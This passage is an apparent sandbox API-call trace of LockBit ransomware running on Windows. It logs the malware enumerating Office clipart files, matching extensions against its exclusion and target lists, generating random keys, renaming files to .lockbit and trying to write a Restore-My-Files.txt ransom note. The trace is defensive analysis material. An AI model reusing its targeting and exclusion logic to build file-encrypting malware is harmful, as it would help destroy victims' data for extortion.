Office\\CLIPART\\PUB60COR\\TN00411_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.456] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.456] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.457] free (_Block=0x1fa2ed8) [0179.458] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.458] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.458] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e9e8900, ftCreationTime.dwHighDateTime=0x1bd4bd7, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e9e8900, ftLastWriteTime.dwHighDateTime=0x1bd4bd7, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00687_.WMF", cAlternateFileName="")) returned 1 [0179.458] lstrcmpiW (lpString1=".", lpString2="TN00687_.WMF") returned -1 [0179.458] lstrcmpiW (lpString1="..", lpString2="TN00687_.WMF") returned -1 [0179.458] PathFindExtensionW (pszPath="TN00687_.WMF") returned=".WMF" [0179.458] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.458] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.459] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.459] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="ntldr", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00687_.WMF") returned -1 [0179.460] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00687_.WMF") returned -1 [0179.460] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.460] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF") returned=".WMF" [0179.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.460] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.460] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.461] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.461] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF.lockbit") returned 72 [0179.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00687_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0179.464] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.464] malloc (_Size=0x40068) returned 0x3d70450 [0179.464] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2514) returned 1 [0179.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0179.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0179.465] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.467] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.467] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.468] free (_Block=0x1fa2ed8) [0179.468] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00687_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.469] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.469] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd723f700, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd723f700, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN01164_.WMF", cAlternateFileName="")) returned 1 [0179.469] lstrcmpiW (lpString1=".", lpString2="TN01164_.WMF") returned -1 [0179.469] lstrcmpiW (lpString1="..", lpString2="TN01164_.WMF") returned -1 [0179.469] PathFindExtensionW (pszPath="TN01164_.WMF") returned=".WMF" [0179.469] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.469] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.470] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.470] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.471] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN01164_.WMF") returned -1 [0179.471] lstrcmpiW (lpString1="ntldr", lpString2="TN01164_.WMF") returned -1 [0179.471] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN01164_.WMF") returned -1 [0179.471] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN01164_.WMF") returned -1 [0179.471] lstrcmpiW (lpString1="autorun.inf", lpString2="TN01164_.WMF") returned -1 [0179.472] lstrcmpiW (lpString1="thumbs.db", lpString2="TN01164_.WMF") returned -1 [0179.472] lstrcmpiW (lpString1="iconcache.db", lpString2="TN01164_.WMF") returned -1 [0179.472] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.472] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF") returned=".WMF" [0179.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.472] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.472] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.473] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.473] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF.lockbit") returned 72 [0179.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01164_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.474] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.474] malloc (_Size=0x40068) returned 0x3f70048 [0179.474] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=566) returned 1 [0179.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.474] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.475] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.476] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.476] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.477] free (_Block=0x1fa2ed8) [0179.477] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01164_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.477] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.477] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fba7700, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6fba7700, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x66a, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN01165_.WMF", cAlternateFileName="")) returned 1 [0179.477] lstrcmpiW (lpString1=".", lpString2="TN01165_.WMF") returned -1 [0179.477] lstrcmpiW (lpString1="..", lpString2="TN01165_.WMF") returned -1 [0179.477] PathFindExtensionW (pszPath="TN01165_.WMF") returned=".WMF" [0179.477] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.477] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.477] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.478] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.479] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.479] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN01165_.WMF") returned -1 [0179.479] lstrcmpiW (lpString1="ntldr", lpString2="TN01165_.WMF") returned -1 [0179.479] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN01165_.WMF") returned -1 [0179.479] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN01165_.WMF") returned -1 [0179.479] lstrcmpiW (lpString1="autorun.inf", lpString2="TN01165_.WMF") returned -1 [0179.479] lstrcmpiW (lpString1="thumbs.db", lpString2="TN01165_.WMF") returned -1 [0179.480] lstrcmpiW (lpString1="iconcache.db", lpString2="TN01165_.WMF") returned -1 [0179.480] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.480] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft 